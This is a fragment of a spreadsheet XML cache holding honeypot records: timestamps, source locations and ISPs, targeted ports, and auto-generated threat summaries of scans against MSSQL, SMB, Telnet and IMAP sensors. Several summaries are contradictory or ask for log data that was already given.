    <s v="Morocco"/>
    <s v="01"/>
    <s v="Tanger-Tetouan-Al Hoceima"/>
    <s v="Tanger-Assilah"/>
    <s v="Boukhalef"/>
    <s v="2572146"/>
    <s v="NA"/>
    <s v="35.7328"/>
    <s v="-5.89954"/>
    <s v="6713"/>
    <s v="Itissalat Al-MAGHRIB"/>
    <s v="Itissalat Al-MAGHRIB"/>
    <s v="residential"/>
    <s v="IP ADSL MarocTelecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4ce:e197"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="770"/>
    <x v="770"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T11:01:50"/>
    <d v="2025-04-26T11:01:50"/>
    <d v="2025-04-26T11:01:50"/>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d9:532d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected, as telnet is NA (not available). &amp;&amp; No malicious activity detected for TELNET service. The log is indicating that there were no incoming connections to the TELNET service during the monitoring period. No attempts to exploit or scan TELNET vulnerabilities reported."/>
    <s v="Port Scan &amp;&amp; Telnet Scan"/>
  </r>
  <r>
    <x v="771"/>
    <x v="771"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:41:43"/>
    <d v="2024-11-29T15:07:30"/>
    <d v="2025-04-26T10:41:43"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1989-01-06"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2ff7:4d2a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="772"/>
    <x v="772"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:37:27"/>
    <d v="2025-02-15T15:07:40"/>
    <d v="2025-04-26T10:37:27"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="143&amp;&amp;5900&amp;&amp;443&amp;&amp;25&amp;&amp;21&amp;&amp;23&amp;&amp;3389&amp;&amp;NA&amp;&amp;19968&amp;&amp;6379&amp;&amp;110"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="2005-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_IMAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '5.181.21.224', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b0a7"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The presence of this log entry suggests that an attacker is attempting to exploit the IMAP service for malicious purposes, possibly to gain unauthorized access or launch further attacks. The IMAP service appears to be inactive or not responding as expected. This could indicate a scanning activity from the attacker's side."/>
    <s v="IMAP Attack"/>
  </r>
  <r>
    <x v="773"/>
    <x v="773"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:29:39"/>
    <d v="2025-01-13T23:17:03"/>
    <d v="2025-04-26T10:29:39"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;10661&amp;&amp;14434&amp;&amp;10072&amp;&amp;15840"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay Static"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,22376)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,10125)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,12169)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,12638)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,21378)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,9977)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.90.224,21778)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:5ae0"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Here are the possible malicious activities and the corresponding attack types: &amp;&amp; The presence of this log indicates an attempt to exploit Microsoft SQL Server vulnerability, likely through a brute-force attack or malicious query injection, attempting to gain unauthorized access to the database. _x000a_This behavior is often associated with credential stuffing and password cracking attempts._x000a_A potential data breach or system compromise may be imminent if left unchecked."/>
    <s v="The attacker is attempting to gather information about the network and its services by sending various probes and requests. They are trying to identify vulnerabilities in the system, possibly for future exploitation. The attacker is also attempting to authenticate with different protocols, likely as part of a reconnaissance or enumeration phase."/>
  </r>
  <r>
    <x v="774"/>
    <x v="774"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:16:46"/>
    <d v="2025-03-17T14:09:23"/>
    <d v="2025-04-26T10:16:46"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H43&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="S.A.S Nagar"/>
    <s v="S.A.S Nagar (Industrial Area)"/>
    <s v="8407426"/>
    <s v="NA"/>
    <s v="30.7165"/>
    <s v="76.6905"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2009-02-11"/>
    <s v="BroadBand_Customers_New_Town"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:29e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates an attempt to access or interact with Microsoft SQL Server services, potentially for malicious purposes such as data theft or unauthorized access. The lack of data (indicated by 'NA') may suggest the attacker is probing for vulnerabilities or testing system defenses. This activity suggests a potential SQL injection attack."/>
    <m/>
  </r>
  <r>
    <x v="775"/>
    <x v="775"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:10:37"/>
    <d v="2024-12-06T08:26:15"/>
    <d v="2025-04-26T10:10:37"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AM"/>
    <s v="Armenia"/>
    <s v="ER"/>
    <s v="Yerevan"/>
    <s v="NA"/>
    <s v="Yerevan (Kanakerr-Zeytun)"/>
    <s v="616052"/>
    <s v="NA"/>
    <s v="40.2096"/>
    <s v="44.5306"/>
    <s v="12297"/>
    <s v="Telecom Armenia OJSC"/>
    <s v="Telecom Armenia CJSC"/>
    <s v="business"/>
    <s v="Armenia Telephone Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2a0:d866"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is no log data provided, so I have nothing to analyze or describe as possible malicious activity. &amp;&amp; There is insufficient information to analyze. This log data appears blank, providing no insight into potential malicious activities. The lack of details makes it impossible to draw any conclusions about possible threats."/>
    <s v="I'd be happy to help, but it seems like there's no log data provided. Could you please share the actual log data from the honeypot? I'll do my best to analyze it and provide the types of attacks detected."/>
  </r>
  <r>
    <x v="776"/>
    <x v="776"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:10:35"/>
    <d v="2025-03-21T08:09:58"/>
    <d v="2025-04-26T10:10:35"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Bernardo do Campo"/>
    <s v="São Bernardo do Campo"/>
    <s v="3449344"/>
    <s v="NA"/>
    <s v="-23.6939"/>
    <s v="-46.565"/>
    <s v="267458"/>
    <s v="ITMINDS CONSULTORIA EM TECNOLOGIA DA INFORMACAO"/>
    <s v="Itminds Consultoria EM Tecnologia DA Informacao"/>
    <s v="business"/>
    <s v="Itminds Consultoria EM Tecnologia DA Informacao"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c08d:2297"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze the log data for possible malicious activity."/>
    <s v="I don't see any log data provided. Please provide the log data so I can analyze it and identify the types of attacks."/>
  </r>
  <r>
    <x v="777"/>
    <x v="777"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T10:07:48"/>
    <d v="2025-04-11T10:25:24"/>
    <d v="2025-04-26T10:07:48"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Thāne (Kashish Park)"/>
    <s v="1254661"/>
    <s v="400601"/>
    <s v="19.1874"/>
    <s v="72.9631"/>
    <s v="58678"/>
    <s v="Intech Online Private Limited"/>
    <s v="MACH1"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2014-09-04"/>
    <s v="MACH1-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.242.209.230,58657)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf2:d1e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: Incoming unauthorized SMB connection from suspicious IP 43.242.209.230 attempting to connect to port 58657, potentially indicating a network scanning or exploitation attempt to access shared resources. The IP appears to be from an unknown or untrusted source, adding to the suspicion of malicious intent. &amp;&amp; Possible malicious activity is an incoming unauthorized SMB connection from an IP address trying to establish a non-standard port 58657 which could be a potential sign of exploitation or scanning activity. The source IP address may be attempting to access system resources or sensitive files. This type of connection may indicate a brute force attack on shared folders."/>
    <s v="Portscan &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="778"/>
    <x v="778"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T09:46:52"/>
    <d v="2025-04-26T09:46:52"/>
    <d v="2025-04-26T09:46:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="12"/>
    <s v="Soccsksargen"/>
    <s v="Province of Cotabato"/>
    <s v="Patindeguen"/>
    <s v="1694382"/>
    <s v="NA"/>
    <s v="7.21972"/>
    <s v="124.498"/>
    <s v="132199"/>
    <s v="GLOBE-MOBILE-5TH-GEN-AS"/>
    <s v="Globe Telecom"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:781c:c9d9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="779"/>
    <x v="779"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T09:28:00"/>
    <d v="2025-04-26T09:28:00"/>
    <d v="2025-04-26T09:28:00"/>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d4:1e21"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data indicates an attempt to connect or communicate via TELNET but was unsuccessful. This could be an initial reconnaissance step by an attacker. The lack of connection may suggest the attacker's failure to compromise the system. &amp;&amp; No login attempt was made via telnet service. No malicious activity detected for this service. Normal operation assumed."/>
    <m/>
  </r>
  <r>
    <x v="780"/>
    <x v="780"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T09:21:07"/>
    <d v="2025-01-13T01:07:48"/>
    <d v="2025-04-26T09:21:07"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Rohtak"/>
    <s v="Rohtak (Company Bagh)"/>
    <s v="1258076"/>
    <s v="124001"/>
    <s v="28.8999"/>
    <s v="76.5844"/>
    <s v="132771"/>
    <s v="Fibre Air Services Private Limited"/>
    <s v="Fibre Air Services Private Limited"/>
    <s v="business"/>
    <s v="Sdnet10"/>
    <s v="None"/>
    <s v="SDNET10"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a7:cc1a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="781"/>
    <x v="781"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T09:06:44"/>
    <d v="2025-04-26T09:06:44"/>
    <d v="2025-04-26T09:06:44"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:f220"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No attempt was made to connect using TELNET, which could indicate legitimate or benign activity since no connection was established. This may be due to incorrect credentials or an inactive service. The lack of any TELNET activity does not necessarily suggest malicious intentions. &amp;&amp; The data suggests there was no activity recorded for the TELNET service, indicating it may have been scanned or probed but not exploited. No login attempts were made to this service. This could be an attempt to gather information about potential vulnerabilities."/>
    <s v="Port Scanning &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="782"/>
    <x v="782"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T08:36:49"/>
    <d v="2025-04-26T08:36:49"/>
    <d v="2025-04-26T08:36:49"/>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e:8f70"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="783"/>
    <x v="783"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T08:24:59"/>
    <d v="2024-04-10T09:58:00"/>
    <d v="2025-04-26T08:24:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="58200&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:e2ae"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No attempts were made to connect to telnet service, or connection was unsuccessful._x000a_No malicious activity detected for this service._x000a_No notable events occurred involving telnet. &amp;&amp; No malicious activity detected as TELNET service is not active according to log data, implying no potential incoming connections. This indicates that the system is secure from TELNET-based attacks for now. No activity was recorded which could indicate a vulnerability in this particular service."/>
    <m/>
  </r>
  <r>
    <x v="784"/>
    <x v="784"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T08:13:21"/>
    <d v="2025-04-26T08:13:21"/>
    <d v="2025-04-26T08:13:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="112"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Wormerland"/>
    <s v="Wormer"/>
    <s v="2744174"/>
    <s v="1531"/>
    <s v="52.4951"/>
    <s v="4.7971"/>
    <s v="49870"/>
    <s v="AS49870-BV"/>
    <s v="Alsycon B.V."/>
    <s v="hosting"/>
    <s v="Alsycon B.V"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
